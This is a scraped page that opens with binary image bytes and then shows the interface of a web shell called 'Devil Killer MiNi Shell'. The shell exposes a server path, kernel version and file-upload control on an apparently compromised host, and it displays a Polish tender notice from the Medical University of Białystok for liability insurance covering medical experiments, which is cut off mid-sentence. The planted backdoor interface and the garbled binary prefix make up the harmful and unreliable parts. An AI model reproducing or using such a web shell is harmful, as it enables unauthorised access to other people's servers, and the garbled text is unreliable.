JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20220126/0003596401-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa obowiązkowego ubezpieczenia odpowiedzialności cywilnej podmiotu przeprowadzającego eksperymenty medyczne </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">UNIWERSYTET MEDYCZNY W BIAŁYMSTOKU</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Dział Zamówień Publicznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000288604</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Jana Kilińskiego 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Białystok</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">15-089</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL841 - Białostocki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zampubl@umb.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.umb.edu.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> uczelnia publiczna </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa obowiązkowego ubezpieczenia odpowiedzialności cywilnej podmiotu przeprowadzającego eksperymenty medyczne </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-db65fc15-7e9a-11ec-83b1-bea871b78b5b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00035964</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-01-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://umedbialystok.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Komunikacja zamawiającego<br/>z wykonawcami odbywa się za pomocą środków komunikacji elektronicznej, za pośrednictwem<br/>Platformy zakupowej znajdującej się pod adresem: https://umedbialystok.ezamawiajacy.pl w<br/>zakładce„Korespondencja”.2.Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną<br/>do Zamawiającego, uważa się za dokumenty złożone w terminie, jeśli ich czytelna treść dotrze<br/>do Zamawiającego przed upływem tego terminu. Za datę wpływu oświadczeń, wniosków,<br/>zawiadomień oraz informacji przyjmuje się datę ich złożenia/wysłania na<br/>Platformie: https://umedbialystok.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Ogólne<br/>zasady korzystania z Platformy, z zastrzeżeniem pkt 8 niniejszego Rozdziału;1. zgłoszenie<br/>do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie<br/>UniwersytetuMedycznego w Białymstoku; https://umedbialystok.ezamawiajacy.pl,<br/>lubhttps://oneplace.marketplanet.pl.2. Wykonawca po wybraniu opcji „Przystąp do postępowania”<br/>zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o<br/>możliwościzalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując<br/>kroki procesurejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje<br/>kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”. 3. Rejestracja Wykonawcy<br/>trwamaksymalnie do 2 dni roboczych. W związku z tym Zamawiający zaleca Wykonawcom<br/>uwzględnienieczasu niezbędnego na rejestrację w procesie złożenia Oferty w postaci elektronicznej.<br/>Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma informację, o<br/>możliwościprzyspieszenia procedury założenia konta, wówczas należy skontaktować się pod numerem<br/>telefonupodanym w ww. potwierdzeniu. 4. Po założeniu konta Wykonawca ma możliwość złożenia<br/>Oferty w postępowaniu. Komunikacja między Zamawiającym a Wykonawcami, w szczególności<br/>zawiadomieniaoraz informacje, przekazywane są w formie elektronicznej za pośrednictwem Platformy<br/>Zakupowej. Za datę przekazania zaświadczeń oraz informacji przyjmuje się datę ich wysłania za<br/>pośrednictwem zakładki „Korespondencja”.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">http://umedbialystok.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia<br/>ParlamentuEuropejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych wzwiązku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych orazuchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L<br/>119 z04.05.2016, str. 1), dalej „RODO”, informuję, że: administratorem Pani/Pana<br/>danychosobowych jestUniwersytet Medyczny w Białymstoku, ul. Jana Kilińskiego 1, 15-089 Białystok, NIP<br/>542-021-17-17,REGON 000288604, reprezentowany przez Rektora;Uniwersytet<br/>Medyczny w<br/>Białymstoku powołał IOD z którym można skontaktować się w sprawach<br/>danych osobowychwysyłając informacje na adres e-mail: iod@umb.edu.pl lub poprzez inne dane<br/>kontaktowe podane nastronach internetowych Uczelni,Pana/i dane osobowe<br/>przetwarzanebędą w celu związanym zprowadzeniem postępowania o udzielenie zamówienia publicznego na<br/>podstawie art. 6 ust. 1 lit. cRODO (tj. obowiązku prawnego ciążącego na administratorze – ustawa<br/>Prawo zamówieńpublicznych),odbiorcami Pana/i danych osobowych mogą być<br/>osoby lub<br/>podmioty, którymudostępniona zostanie dokumentacja postępowania na podstawie art. 18 ust. 1 oraz<br/>art. 74 ustawy zdnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2019 r., poz. 2019,<br/>ze zm.), osoby wnioskujące o udostępnienie informacji publicznej, właściciel<br/>platformy dopublikowania postępowań o udzielenie zamówienia publicznego,<br/>Pana/i dane<br/>osobowe wzwiązku z jawnością postępowania o udzielenie zamówienia publicznego mogą być<br/>przekazywane dopaństw trzecich,Pana/i dane osobowe będą przechowywane,<br/>zgodnie z art.78 ust. 1 ustawyPzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, ajeżeli czastrwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowylub teżprzez okres dłuższy w przypadku postępowań finansowanych ze środków unijnych;<br/>obowiązekpodania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiemustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>oudzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawyPzp; w odniesieniu do Pani/Pana danych osobowych decyzje nie będą<br/>podejmowane<br/>wsposóbzautomatyzowany, o którym mowa w art. 22 RODO; posiada Pana/i:− napodstawieart.15 RODOprawo dostępu do danych osobowych Pani/Pana dotyczących;− na podstawie art. 16 RODO<br/>prawo dosprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może<br/>naruszaćintegralności protokołu oraz jego załączników),− na podstawie art. 18 RODO prawo żądania<br/>odadministratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o<br/>którychmowa w art. 18 ust. 2 RODO − prawo do wniesienia skargi do Prezesa Urzędu OchronyDanychOsobowych, ul. Stawki 2, 00-193 Warszawa, gdy uzna Pani/Pan, że przetwarzanie<br/>przezadministratora Pani/Pana danych osobowych narusza przepisy RODO; nieprzysługuje<br/>Pani/u:−prawo do usunięcia danych osobowych w związku z art. 17 ust. 3 lit. b, d lub e RODO;−<br/>prawo doprzenoszenia danych osobowych, o którym mowa w art. 20 RODO;− prawo do sprzeciwu<br/>wobecprzetwarzania danych osobowych, na podstawie art. 21 RODO, gdyż podstawą prawną<br/>przetwarzaniaPani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>odstawę przetwarzania tzw. danych szczególnych kategorii przez zakłady ubezpieczeń stanowi przede wszystkim ustawa o działalności ubezpieczeniowej i reasekuracyjnej. Art. 41 ww. ustawy stanowi, że zakład ubezpieczeń przetwarza dane dotyczące zdrowia, ubezpieczonych lub uprawnionych z umowy ubezpieczenia, zawarte w umowach ubezpieczenia lub oświadczeniach składanych przed zawarciem umowy ubezpieczenia, odpowiednio w celu oceny ryzyka ubezpieczeniowego lub wykonania umowy ubezpieczenia, w zakresie niezbędnym z uwagi na cel i rodzaj ubezpieczenia. Art. 42 ust. 2 daje również możliwość przetwarzania danych dotyczących wyroków skazujących i naruszeń prawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">AZP.25.2.1.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest usługa obowiązkowego ubezpieczenia odpowiedzialności cywil-nej podmiotu przeprowadzającego eksperymenty medyczne od dnia podpisania umowy przez okres 12 miesięcy w ramach umowy grupowej/generalnej. Szczegółowy opis przedmiotu za-mówienia zawiera Załącznik nr 1 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66510000-8 - Usługi ubezpieczeniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">1. Zamawiający przewiduje udzielenie zamówienia polegającego na powtórzeniu podobnych usług, zgodnie z art. 214 ust. 1 pkt 7 w zw. z art. 305 ust 1 ustawy Pzp: <br/>A. ubezpieczenia dodatkowego zakresu w ramach podstawowych ubezpieczeń.<br/>Wykonawca zobowiązany będzie przy powtórzeniu podobnych usług do zastosowania:<br/>- stawek nie wyższych niż zastosowane w zamówieniu podstawowym oraz nie będzie stosował stawek minimalnych wynikających z zasady określającej minimalną składkę;<br/>- zakresu co najmniej tożsamego z zakresem określonym w zamówieniu podstawowym w odnie-sieniu do poszczególnych ryzyk ubezpieczeniowych;<br/>- przy kalkulacji składki uwzględni okres rzeczywiście udzielanej ochrony według systemu pro rata temporis za każdy dzień.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Jako kryterium wyboru oferty przyjmuje się najkorzystniejszy bilans (Σ) uzyskanych punktów z tytułu:<br/>A - cena oferty - 60%<br/>B - warunki ubezpieczenia - 40%<br/><br/> Σ = A + B<br/>A – cena oferty<br/>Maksymalną ilość punktów otrzyma Wykonawca, który zaproponuje najniższą łączną składkę. Po-zostali Wykonawcy otrzymają stosowną ilość punktów obliczoną według wzoru: <br/><br/>Ocena oferty = Cn x Wa x Wp<br/> Cb<br/>gdzie:<br/>Cn – cena najniższa zaproponowana (suma wszystkich składek jednego Wykonawcy ) <br/>Cb – cena badanej oferty (suma wszystkich składek jednego Wykonawcy )<br/>Wa – waga procentowa dla kryterium cena oferty<br/>Wp – współczynnik proporcjonalności = 100<br/>B – warunki ubezpieczenia <br/>Ocena ofert zostanie dokonana na podstawie Załącznika Nr 2 do SWZ – Formularza ofertowego. Maksymalną ilość punktów za warunki ubezpieczenia otrzyma Wykonawca, który zaakceptuje treść proponowanych klauzul fakultatywnych, rozszerzenie zakresu ubezpieczenia.<br/>Pozostali Wykonawcy otrzymają stosowną ilość punktów obliczoną według wzoru:<br/>Ocena oferty = Wu x Wb x Wp <br/> 20<br/>gdzie:<br/>Wu – warunki ubezpieczenia badanej oferty<br/>Wb – waga procentowa dla kryterium warunki ubezpieczenia<br/>Wp – współczynnik proporcjonalności = 100<br/>10 – łączna liczba możliwych do zdobycia punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">warunki ubezpieczenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:<br/>1. nie podlegają wykluczeniu w związku z brakiem podstaw wykluczenia, o których mowa w<br/>Części XV SWZ,<br/>2. spełniają warunki udziału w postępowaniu dotyczące:<br/>2.1. zdolności do występowania w obrocie gospodarczym - Zamawiający nie określa<br/>warunku;2.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o<br/>ile<br/>wynika to z odrębnych przepisów - Wykonawca musi posiadać zezwolenie Komisji Nadzoru<br/>Finansowego<br/>na prowadzenie działalności ubezpieczeniowej, ważne w okresie realizacji zamówienia;<br/>2.3. sytuacji ekonomicznej lub finansowej - Zamawiający nie określa warunku;<br/>2.4 zdolności technicznej lub zawodowej - Zamawiający nie określa warunku.<br/>Spełnianie warunków udziału w postępowaniu, o których mowa powyżej, zostanie<br/>zweryfikowane na podstawie przedłożonego wraz z ofertą oświadczenia, które stanowi tymczasowe zapewnienie przez wykonawcę, że spełnia warunki udziału w postępowaniu, stanowiącego załącznik nr 3 do SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, Zamawiający wezwie Wykonawcę, którego oferta została<br/>najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia we-zwania,<br/>zamiast podmiotowych środków dowodowych:<br/>1. w celu potwierdzenia braku podstaw wykluczenia - aktualnego na dzień złożenia oświadczenia<br/>wykonawcy o aktualności informacji zawartych w oświadczeniu o braku podstaw wykluczenia złożonym<br/>wraz z ofertą – wg Załącznika nr 7 do SWZ,</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, Zamawiający wezwie Wykonawcę,<br/>którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni<br/>od dnia we-zwania, zamiast podmiotowych środków dowodowych:<br/>w celu potwierdzenia spełniania warunków udziału w postępowaniu - aktualnego na dzień złożenia<br/>oświadczenia wykonawcy o spełnianiu warunków udziału w postępowaniu – wg Załącznika nr 8 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> warunki ubezpieczenia stanowią przedmiotowe środki dowodowe, na potwierdzenie zgodności oferowanej usługi z wymaganiami i cechami określonymi w opisie przedmiotu zamówienia.<br/>Zamawiający zaakceptuje równoważne przedmiotowe środki dowodowe, jeżeli będą potwierdzały, że oferowana usługa spełnia określone przez zamawiającego wymagania, cechy. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Zamawiający zaakceptuje równoważne przedmiotowe środki dowodowe, jeżeli będą<br/>potwierdzały, że oferowana usługa spełnia określone przez zamawiającego wymagania, cechy.<br/>Jeżeli wykonawca nie złoży przedmiotowych środków dowodowych lub przedmiotowe środki<br/>będą niekompletne, zamawiający wezwie do ich złożenia lub uzupełniania w wyznaczonym<br/>terminie. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Do oferty należy dołączyć następujące dokumenty: <br/>1.1.	formularz ofertowy wg wzoru określonego w Załączniku nr 2 do SWZ; <br/>1.2. warunki ubezpieczenia,<br/>1.3	oświadczenie dotyczące spełniania warunków udziału w postępowaniu, którego wzór stanowi załącznik nr 3 do SWZ;<br/>1.4. oświadczenie o niepodleganiu wykluczeniu, którego wzór stanowi załącznik nr 4 do SWZ; <br/>1.5.	o ile nie wynika to ze złożonych dokumentów do oferty lub z bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (tekst jednolity Dz. U. z 2020 r. poz. 346 z późn. zm.) do oferty należy załączyć pełnomocnictwo lub inny dokument potwierdzający umocowanie osoby lub osób podpisujących ofertę do reprezentowania Wyko-nawcy;<br/>1.6. w przypadku gdy Wykonawca powołuje się na zasoby innego podmiotu, oświadczenie o nie-podleganiu wykluczeniu, którego wzór stanowi załącznik nr 4 do SWZ oraz oświadczenie doty-czące spełniania warunków udziału w postępowaniu, którego wzór stanowi załącznik nr 3 do SWZ składa również podmiot, na zasoby, którego powołuje się Wykonawca;<br/>1.7.	w przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o niepodleganiu wykluczeniu, którego wzór stanowi załącznik 4 do SWZ oraz oświadczenie dotyczące spełniania warunków udziału w postępowaniu, którego wzór stanowi załącznik nr 3 do SWZ, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>ustanawiają pełnomocnika do ich reprezentowania w postępowaniu o udzielenie zamówienia<br/>publicznego, albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie<br/>ubiegających się<br/>o udzielenie zamówienia. Dokument pełnomocnictwa musi być załączony do oferty i zawieraćw<br/>szczególności wskazanie: postępowania o zamówienie publiczne, którego dotyczy,<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia, ustanowionego pełnomocnika<br/>oraz zakres jego umocowania, obejmujący przede wszystkim: reprezentowanie wykonawców<br/>wspólnie ubiegających 